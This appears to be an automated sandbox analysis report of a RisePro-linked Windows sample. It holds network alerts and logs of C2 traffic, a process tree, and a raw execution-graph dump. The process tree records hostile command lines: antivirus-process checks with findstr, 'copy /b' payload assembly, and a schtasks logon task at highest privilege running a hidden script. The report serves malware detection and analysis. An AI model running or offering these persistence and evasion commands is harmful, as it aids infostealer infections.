                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-09-26T09:53:17.211359+02002049060ET MALWARE RisePro TCP Heartbeat Packet1192.168.2.8497103.36.173.850500TCP
                                2024-09-26T09:53:20.188890+02002046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)1192.168.2.8497103.36.173.850500TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Sep 26, 2024 09:53:17.196104050 CEST4971050500192.168.2.83.36.173.8
                                Sep 26, 2024 09:53:17.201184988 CEST50500497103.36.173.8192.168.2.8
                                Sep 26, 2024 09:53:17.201289892 CEST4971050500192.168.2.83.36.173.8
                                Sep 26, 2024 09:53:17.211359024 CEST4971050500192.168.2.83.36.173.8
                                Sep 26, 2024 09:53:17.216183901 CEST50500497103.36.173.8192.168.2.8
                                Sep 26, 2024 09:53:20.188889980 CEST4971050500192.168.2.83.36.173.8
                                Sep 26, 2024 09:53:20.193845034 CEST50500497103.36.173.8192.168.2.8
                                TimestampSource PortDest PortSource IPDest IP
                                Sep 26, 2024 09:49:34.511281013 CEST5479753192.168.2.81.1.1.1
                                Sep 26, 2024 09:49:34.526400089 CEST53547971.1.1.1192.168.2.8
                                Sep 26, 2024 09:49:48.153945923 CEST6103153192.168.2.81.1.1.1
                                Sep 26, 2024 09:49:48.162707090 CEST53610311.1.1.1192.168.2.8
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Sep 26, 2024 09:49:34.511281013 CEST192.168.2.81.1.1.10x7e8fStandard query (0)jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHDA (IP address)IN (0x0001)false
                                Sep 26, 2024 09:49:48.153945923 CEST192.168.2.81.1.1.10x37a1Standard query (0)jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHDA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Sep 26, 2024 09:49:34.526400089 CEST1.1.1.1192.168.2.80x7e8fName error (3)jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHDnonenoneA (IP address)IN (0x0001)false
                                Sep 26, 2024 09:49:48.162707090 CEST1.1.1.1192.168.2.80x37a1Name error (3)jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHDnonenoneA (IP address)IN (0x0001)false

                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:03:49:23
                                Start date:26/09/2024
                                Path:C:\Users\user\Desktop\5daucomrx8.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\5daucomrx8.exe"
                                Imagebase:0x400000
                                File size:19'159'316 bytes
                                MD5 hash:33FF8752083BF6B5105749BF5B772B4A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:03:49:27
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit
                                Imagebase:0xa40000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:03:49:27
                                Start date:26/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:03:49:28
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\tasklist.exe
                                Wow64 process (32bit):true
                                Commandline:tasklist
                                Imagebase:0xfa0000
                                File size:79'360 bytes
                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:5
                                Start time:03:49:28
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /I "wrsa.exe opssvc.exe"
                                Imagebase:0xfa0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:6
                                Start time:03:49:29
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\tasklist.exe
                                Wow64 process (32bit):true
                                Commandline:tasklist
                                Imagebase:0xfa0000
                                File size:79'360 bytes
                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:7
                                Start time:03:49:29
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                Imagebase:0xfa0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:8
                                Start time:03:49:29
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd /c md 369580
                                Imagebase:0xa40000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:03:49:29
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /V "MaskBathroomsCompoundInjection" Participants
                                Imagebase:0xfa0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:10
                                Start time:03:49:30
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z
                                Imagebase:0xa40000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:11
                                Start time:03:49:30
                                Start date:26/09/2024
                                Path:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                                Wow64 process (32bit):true
                                Commandline:369580\Origin.pif 369580\Z
                                Imagebase:0xaa0000
                                File size:937'776 bytes
                                MD5 hash:B06E67F9767E5023892D9698703AD098
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Reputation:moderate
                                Has exited:true

                                Target ID:12
                                Start time:03:49:30
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 15
                                Imagebase:0xea0000
                                File size:25'088 bytes
                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:14
                                Start time:03:49:31
                                Start date:26/09/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST
                                Imagebase:0x9e0000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:15
                                Start time:03:49:31
                                Start date:26/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:16
                                Start time:03:49:33
                                Start date:26/09/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.js"
                                Imagebase:0x7ff6057c0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:17
                                Start time:03:49:33
                                Start date:26/09/2024
                                Path:C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\LinkGuard Dynamics\SecureHawk.pif" "C:\Users\user\AppData\Local\LinkGuard Dynamics\r"
                                Imagebase:0x2f0000
                                File size:937'776 bytes
                                MD5 hash:B06E67F9767E5023892D9698703AD098
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Has exited:false

                                Target ID:21
                                Start time:03:53:02
                                Start date:26/09/2024
                                Path:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                                Imagebase:0xaa0000
                                File size:937'776 bytes
                                MD5 hash:B06E67F9767E5023892D9698703AD098
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:12.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:20.6%
                                  Total number of Nodes:1523
                                  Total number of Limit Nodes:37
                                  execution_graph 4170 402fc0 4171 401446 18 API calls 4170->4171 4172 402fc7 4171->4172 4173 403017 4172->4173 4174 40300a 4172->4174 4177 401a13 4172->4177 4175 406805 18 API calls 4173->4175 4176 401446 18 API calls 4174->4176 4175->4177 4176->4177 4178 4023c1 4179 40145c 18 API calls 4178->4179 4180 4023c8 4179->4180 4183 40726a 4180->4183 4186 406ed2 CreateFileW 4183->4186 4187 406f04 4186->4187 4188 406f1e ReadFile 4186->4188 4189 4062a3 11 API calls 4187->4189 4190 4023d6 4188->4190 4193 406f84 4188->4193 4189->4190 4191 4071e3 CloseHandle 4191->4190 4192 406f9b ReadFile lstrcpynA lstrcmpA 4192->4193 4194 406fe2 SetFilePointer ReadFile 4192->4194 4193->4190 4193->4191 4193->4192 4197 406fdd 4193->4197 4194->4191 4195 4070a8 ReadFile 4194->4195 4196 407138 4195->4196 4196->4195 4196->4197 4198 40715f SetFilePointer GlobalAlloc ReadFile 4196->4198 4197->4191 4199 4071a3 4198->4199 4200 4071bf lstrcpynW GlobalFree 4198->4200 4199->4199 4199->4200 4200->4191 4201 401cc3 4202 40145c 18 API calls 4201->4202 4203 401cca lstrlenW 4202->4203 4204 4030dc 4203->4204 4205 4030e3 4204->4205 4207 405f51 wsprintfW 4204->4207 4207->4205 4222 401c46 4223 40145c 18 API calls 4222->4223 4224 401c4c 4223->4224 4225 4062a3 11 API calls 4224->4225 4226 401c59 4225->4226 4227 406c9b 81 API calls 4226->4227 4228 401c64 4227->4228 4229 403049 4230 401446 18 API calls 4229->4230 4233 403050 4230->4233 4231 406805 18 API calls 4232 401a13 4231->4232 4233->4231 4233->4232 4234 40204a 4235 401446 18 API calls 4234->4235 4236 402051 IsWindow 4235->4236 4237 4018d3 4236->4237 4238 40324c 4239 403277 4238->4239 4240 40325e SetTimer 4238->4240 4241 4032cc 4239->4241 4242 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4239->4242 4240->4239 4242->4241 4243 4048cc 4244 4048f1 4243->4244 4245 4048da 4243->4245 4247 4048ff IsWindowVisible 4244->4247 4251 404916 4244->4251 4246 4048e0 4245->4246 4261 40495a 4245->4261 4248 403daf SendMessageW 4246->4248 4250 40490c 4247->4250 4247->4261 4252 4048ea 4248->4252 4249 404960 CallWindowProcW 4249->4252 4262 40484e SendMessageW 4250->4262 4251->4249 4267 406009 lstrcpynW 4251->4267 4255 404945 4268 405f51 wsprintfW 4255->4268 4257 40494c 4258 40141d 80 API calls 4257->4258 4259 404953 4258->4259 4269 406009 lstrcpynW 4259->4269 4261->4249 4263 404871 GetMessagePos ScreenToClient SendMessageW 4262->4263 4264 4048ab SendMessageW 4262->4264 4265 4048a3 4263->4265 4266 4048a8 4263->4266 4264->4265 4265->4251 4266->4264 4267->4255 4268->4257 4269->4261 4270 4022cc 4271 40145c 18 API calls 4270->4271 4272 4022d3 4271->4272 4273 4062d5 2 API calls 4272->4273 4274 4022d9 4273->4274 4275 4022e8 4274->4275 4279 405f51 wsprintfW 4274->4279 4278 4030e3 4275->4278 4280 405f51 wsprintfW 4275->4280 4279->4275 4280->4278 4281 4050cd 4282 405295 4281->4282 4283 4050ee GetDlgItem GetDlgItem GetDlgItem 4281->4283 4284 4052c6 4282->4284 4285 40529e GetDlgItem CreateThread CloseHandle 4282->4285 4330 403d98 SendMessageW 4283->4330 4287 4052f4 4284->4287 4289 4052e0 ShowWindow ShowWindow 4284->4289 4290 405316 4284->4290 4285->4284 4291 405352 4287->4291 4293 405305 4287->4293 4294 40532b ShowWindow 4287->4294 4288 405162 4301 406805 18 API calls 4288->4301 4335 403d98 SendMessageW 4289->4335 4339 403dca 4290->4339 4291->4290 4296 40535d SendMessageW 4291->4296 4336 403d18 4293->4336 4299 40534b 4294->4299 4300 40533d 4294->4300 4298 40528e 4296->4298 4303 405376 CreatePopupMenu 4296->4303 4302 403d18 SendMessageW 4299->4302 4304 404f72 25 API calls 4300->4304 4305 405181 4301->4305 4302->4291 4306 406805 18 API calls 4303->4306 4304->4299 4307 4062a3 11 API calls 4305->4307 4309 405386 AppendMenuW 4306->4309 4308 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4307->4308 4310 4051f3 4308->4310 4311 4051d7 SendMessageW SendMessageW 4308->4311 4312 405399 GetWindowRect 4309->4312 4313 4053ac 4309->4313 4314 405206 4310->4314 4315 4051f8 SendMessageW 4310->4315 4311->4310 4316 4053b3 TrackPopupMenu 4312->4316 4313->4316 4331 403d3f 4314->4331 4315->4314 4316->4298 4318 4053d1 4316->4318 4320 4053ed SendMessageW 4318->4320 4319 405216 4321 405253 GetDlgItem SendMessageW 4319->4321 4322 40521f ShowWindow 4319->4322 4320->4320 4323 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4320->4323 4321->4298 4326 405276 SendMessageW SendMessageW 4321->4326 4324 405242 4322->4324 4325 405235 ShowWindow 4322->4325 4327 40542f SendMessageW 4323->4327 4334 403d98 SendMessageW 4324->4334 4325->4324 4326->4298 4327->4327 4328 40545a GlobalUnlock SetClipboardData CloseClipboard 4327->4328 4328->4298 4330->4288 4332 406805 18 API calls 4331->4332 4333 403d4a SetDlgItemTextW 4332->4333 4333->4319 4334->4321 4335->4287 4337 403d25 SendMessageW 4336->4337 4338 403d1f 4336->4338 4337->4290 4338->4337 4340 403ddf GetWindowLongW 4339->4340 4350 403e68 4339->4350 4341 403df0 4340->4341 4340->4350 4342 403e02 4341->4342 4343 403dff GetSysColor 4341->4343 4344 403e12 SetBkMode 4342->4344 4345 403e08 SetTextColor 4342->4345 4343->4342 4346 403e30 4344->4346 4347 403e2a GetSysColor 4344->4347 4345->4344 4348 403e41 4346->4348 4349 403e37 SetBkColor 4346->4349 4347->4346 4348->4350 4351 403e54 DeleteObject 4348->4351 4352 403e5b CreateBrushIndirect 4348->4352 4349->4348 4350->4298 4351->4352 4352->4350 4353 4030cf 4354 40145c 18 API calls 4353->4354 4355 4030d6 4354->4355 4357 4030dc 4355->4357 4360 4063ac GlobalAlloc lstrlenW 4355->4360 4358 4030e3 4357->4358 4387 405f51 wsprintfW 4357->4387 4361 4063e2 4360->4361 4362 406434 4360->4362 4363 40640f GetVersionExW 4361->4363 4388 40602b CharUpperW 4361->4388 4362->4357 4363->4362 4364 40643e 4363->4364 4365 406464 LoadLibraryA 4364->4365 4366 40644d 4364->4366 4365->4362 4369 406482 GetProcAddress GetProcAddress GetProcAddress 4365->4369 4366->4362 4368 406585 GlobalFree 4366->4368 4370 40659b LoadLibraryA 4368->4370 4371 4066dd FreeLibrary 4368->4371 4374 4064aa 4369->4374 4377 4065f5 4369->4377 4370->4362 4373 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4370->4373 4371->4362 4372 406651 FreeLibrary 4381 40662a 4372->4381 4373->4377 4375 4064ce FreeLibrary GlobalFree 4374->4375 4374->4377 4383 4064ea 4374->4383 4375->4362 4376 4066ea 4379 4066ef CloseHandle FreeLibrary 4376->4379 4377->4372 4377->4381 4378 4064fc lstrcpyW OpenProcess 4380 40654f CloseHandle CharUpperW lstrcmpW 4378->4380 4378->4383 4382 406704 CloseHandle 4379->4382 4380->4377 4380->4383 4381->4376 4384 406685 lstrcmpW 4381->4384 4385 4066b6 CloseHandle 4381->4385 4386 4066d4 CloseHandle 4381->4386 4382->4379 4383->4368 4383->4378 4383->4380 4384->4381 4384->4382 4385->4381 4386->4371 4387->4358 4388->4361 4389 407752 4393 407344 4389->4393 4390 407c6d 4391 4073c2 GlobalFree 4392 4073cb GlobalAlloc 4391->4392 4392->4390 4392->4393 4393->4390 4393->4391 4393->4392 4393->4393 4394 407443 GlobalAlloc 4393->4394 4395 40743a GlobalFree 4393->4395 4394->4390 4394->4393 4395->4394 4396 401dd3 4397 401446 18 API calls 4396->4397 4398 401dda 4397->4398 4399 401446 18 API calls 4398->4399 4400 4018d3 4399->4400 4408 402e55 4409 40145c 18 API calls 4408->4409 4410 402e63 4409->4410 4411 402e79 4410->4411 4412 40145c 18 API calls 4410->4412 4413 405e30 2 API calls 4411->4413 4412->4411 4414 402e7f 4413->4414 4438 405e50 GetFileAttributesW CreateFileW 4414->4438 4416 402e8c 4417 402f35 4416->4417 4418 402e98 GlobalAlloc 4416->4418 4421 4062a3 11 API calls 4417->4421 4419 402eb1 4418->4419 4420 402f2c CloseHandle 4418->4420 4439 403368 SetFilePointer 4419->4439 4420->4417 4423 402f45 4421->4423 4425 402f50 DeleteFileW 4423->4425 4426 402f63 4423->4426 4424 402eb7 4428 403336 ReadFile 4424->4428 4425->4426 4440 401435 4426->4440 4429 402ec0 GlobalAlloc 4428->4429 4430 402ed0 4429->4430 4431 402f04 WriteFile GlobalFree 4429->4431 4432 40337f 37 API calls 4430->4432 4433 40337f 37 API calls 4431->4433 4437 402edd 4432->4437 4434 402f29 4433->4434 4434->4420 4436 402efb GlobalFree 4436->4431 4437->4436 4438->4416 4439->4424 4441 404f72 25 API calls 4440->4441 4442 401443 4441->4442 4443 401cd5 4444 401446 18 API calls 4443->4444 4445 401cdd 4444->4445 4446 401446 18 API calls 4445->4446 4447 401ce8 4446->4447 4448 40145c 18 API calls 4447->4448 4449 401cf1 4448->4449 4450 401d07 lstrlenW 4449->4450 4451 401d43 4449->4451 4452 401d11 4450->4452 4452->4451 4456 406009 lstrcpynW 4452->4456 4454 401d2c 4454->4451 4455 401d39 lstrlenW 4454->4455 4455->4451 4456->4454 4457 403cd6 4458 403ce1 4457->4458 4459 403ce5 4458->4459 4460 403ce8 GlobalAlloc 4458->4460 4460->4459 4461 402cd7 4462 401446 18 API calls 4461->4462 4465 402c64 4462->4465 4463 402d99 4464 402d17 ReadFile 4464->4465 4465->4461 4465->4463 4465->4464 4466 402dd8 4467 402ddf 4466->4467 4468 4030e3 4466->4468 4469 402de5 FindClose 4467->4469 4469->4468 4470 401d5c 4471 40145c 18 API calls 4470->4471 4472 401d63 4471->4472 4473 40145c 18 API calls 4472->4473 4474 401d6c 4473->4474 4475 401d73 lstrcmpiW 4474->4475 4476 401d86 lstrcmpW 4474->4476 4477 401d79 4475->4477 4476->4477 4478 401c99 4476->4478 4477->4476 4477->4478 4108 407c5f 4109 407344 4108->4109 4110 4073c2 GlobalFree 4109->4110 4111 4073cb GlobalAlloc 4109->4111 4112 407c6d 4109->4112 4113 407443 GlobalAlloc 4109->4113 4114 40743a GlobalFree 4109->4114 4110->4111 4111->4109 4111->4112 4113->4109 4113->4112 4114->4113 4479 404363 4480 404373 4479->4480 4481 40439c 4479->4481 4483 403d3f 19 API calls 4480->4483 4482 403dca 8 API calls 4481->4482 4484 4043a8 4482->4484 4485 404380 SetDlgItemTextW 4483->4485 4485->4481 4486 4027e3 4487 4027e9 4486->4487 4488 4027f2 4487->4488 4489 402836 4487->4489 4502 401553 4488->4502 4490 40145c 18 API calls 4489->4490 4492 40283d 4490->4492 4494 4062a3 11 API calls 4492->4494 4493 4027f9 4495 40145c 18 API calls 4493->4495 4500 401a13 4493->4500 4496 40284d 4494->4496 4497 40280a RegDeleteValueW 4495->4497 4506 40149d RegOpenKeyExW 4496->4506 4498 4062a3 11 API calls 4497->4498 4501 40282a RegCloseKey 4498->4501 4501->4500 4503 401563 4502->4503 4504 40145c 18 API calls 4503->4504 4505 401589 RegOpenKeyExW 4504->4505 4505->4493 4512 401515 4506->4512 4514 4014c9 4506->4514 4507 4014ef RegEnumKeyW 4508 401501 RegCloseKey 4507->4508 4507->4514 4509 4062fc 3 API calls 4508->4509 4511 401511 4509->4511 4510 401526 RegCloseKey 4510->4512 4511->4512 4515 401541 RegDeleteKeyW 4511->4515 4512->4500 4513 40149d 3 API calls 4513->4514 4514->4507 4514->4508 4514->4510 4514->4513 4515->4512 4516 403f64 4517 403f90 4516->4517 4518 403f74 4516->4518 4520 403fc3 4517->4520 4521 403f96 SHGetPathFromIDListW 4517->4521 4527 405c84 GetDlgItemTextW 4518->4527 4523 403fad SendMessageW 4521->4523 4524 403fa6 4521->4524 4522 403f81 SendMessageW 4522->4517 4523->4520 4525 40141d 80 API calls 4524->4525 4525->4523 4527->4522 4528 402ae4 4529 402aeb 4528->4529 4530 4030e3 4528->4530 4531 402af2 CloseHandle 4529->4531 4531->4530 4532 402065 4533 401446 18 API calls 4532->4533 4534 40206d 4533->4534 4535 401446 18 API calls 4534->4535 4536 402076 GetDlgItem 4535->4536 4537 4030dc 4536->4537 4538 4030e3 4537->4538 4540 405f51 wsprintfW 4537->4540 4540->4538 4541 402665 4542 40145c 18 API calls 4541->4542 4543 40266b 4542->4543 4544 40145c 18 API calls 4543->4544 4545 402674 4544->4545 4546 40145c 18 API calls 4545->4546 4547 40267d 4546->4547 4548 4062a3 11 API calls 4547->4548 4549 40268c 4548->4549 4550 4062d5 2 API calls 4549->4550 4551 402695 4550->4551 4552 4026a6 lstrlenW lstrlenW 4551->4552 4553 404f72 25 API calls 4551->4553 4556 4030e3 4551->4556 4554 404f72 25 API calls 4552->4554 4553->4551 4555 4026e8 SHFileOperationW 4554->4555 4555->4551 4555->4556 4564 401c69 4565 40145c 18 API calls 4564->4565 4566 401c70 4565->4566 4567 4062a3 11 API calls 4566->4567 4568 401c80 4567->4568 4569 405ca0 MessageBoxIndirectW 4568->4569 4570 401a13 4569->4570 4578 402f6e 4579 402f72 4578->4579 4580 402fae 4578->4580 4581 4062a3 11 API calls 4579->4581 4582 40145c 18 API calls 4580->4582 4583 402f7d 4581->4583 4588 402f9d 4582->4588 4584 4062a3 11 API calls 4583->4584 4585 402f90 4584->4585 4586 402fa2 4585->4586 4587 402f98 4585->4587 4590 4060e7 9 API calls 4586->4590 4589 403e74 5 API calls 4587->4589 4589->4588 4590->4588 4591 4023f0 4592 402403 4591->4592 4593 4024da 4591->4593 4594 40145c 18 API calls 4592->4594 4595 404f72 25 API calls 4593->4595 4596 40240a 4594->4596 4601 4024f1 4595->4601 4597 40145c 18 API calls 4596->4597 4598 402413 4597->4598 4599 402429 LoadLibraryExW 4598->4599 4600 40241b GetModuleHandleW 4598->4600 4602 40243e 4599->4602 4603 4024ce 4599->4603 4600->4599 4600->4602 4615 406365 GlobalAlloc WideCharToMultiByte 4602->4615 4604 404f72 25 API calls 4603->4604 4604->4593 4606 402449 4607 40248c 4606->4607 4608 40244f 4606->4608 4609 404f72 25 API calls 4607->4609 4611 401435 25 API calls 4608->4611 4613 40245f 4608->4613 4610 402496 4609->4610 4612 4062a3 11 API calls 4610->4612 4611->4613 4612->4613 4613->4601 4614 4024c0 FreeLibrary 4613->4614 4614->4601 4616 406390 GetProcAddress 4615->4616 4617 40639d GlobalFree 4615->4617 4616->4617 4617->4606 4618 402df3 4619 402dfa 4618->4619 4621 4019ec 4618->4621 4620 402e07 FindNextFileW 4619->4620 4620->4621 4622 402e16 4620->4622 4624 406009 lstrcpynW 4622->4624 4624->4621 4625 402175 4626 401446 18 API calls 4625->4626 4627 40217c 4626->4627 4628 401446 18 API calls 4627->4628 4629 402186 4628->4629 4630 4062a3 11 API calls 4629->4630 4634 402197 4629->4634 4630->4634 4631 4021aa EnableWindow 4633 4030e3 4631->4633 4632 40219f ShowWindow 4632->4633 4634->4631 4634->4632 4642 404077 4643 404081 4642->4643 4644 404084 lstrcpynW lstrlenW 4642->4644 4643->4644 4645 405479 4646 405491 4645->4646 4647 4055cd 4645->4647 4646->4647 4648 40549d 4646->4648 4649 40561e 4647->4649 4650 4055de GetDlgItem GetDlgItem 4647->4650 4651 4054a8 SetWindowPos 4648->4651 4652 4054bb 4648->4652 4654 405678 4649->4654 4662 40139d 80 API calls 4649->4662 4653 403d3f 19 API calls 4650->4653 4651->4652 4656 4054c0 ShowWindow 4652->4656 4657 4054d8 4652->4657 4658 405608 SetClassLongW 4653->4658 4655 403daf SendMessageW 4654->4655 4675 4055c8 4654->4675 4684 40568a 4655->4684 4656->4657 4659 4054e0 DestroyWindow 4657->4659 4660 4054fa 4657->4660 4661 40141d 80 API calls 4658->4661 4712 4058dc 4659->4712 4663 405510 4660->4663 4664 4054ff SetWindowLongW 4660->4664 4661->4649 4665 405650 4662->4665 4668 405587 4663->4668 4669 40551c GetDlgItem 4663->4669 4664->4675 4665->4654 4670 405654 SendMessageW 4665->4670 4666 40141d 80 API calls 4666->4684 4667 4058de DestroyWindow EndDialog 4667->4712 4671 403dca 8 API calls 4668->4671 4673 40554c 4669->4673 4674 40552f SendMessageW IsWindowEnabled 4669->4674 4670->4675 4671->4675 4672 40590d ShowWindow 4672->4675 4677 405559 4673->4677 4678 4055a0 SendMessageW 4673->4678 4679 40556c 4673->4679 4687 405551 4673->4687 4674->4673 4674->4675 4676 406805 18 API calls 4676->4684 4677->4678 4677->4687 4678->4668 4682 405574 4679->4682 4683 405589 4679->4683 4680 403d18 SendMessageW 4680->4668 4681 403d3f 19 API calls 4681->4684 4685 40141d 80 API calls 4682->4685 4686 40141d 80 API calls 4683->4686 4684->4666 4684->4667 4684->4675 4684->4676 4684->4681 4688 403d3f 19 API calls 4684->4688 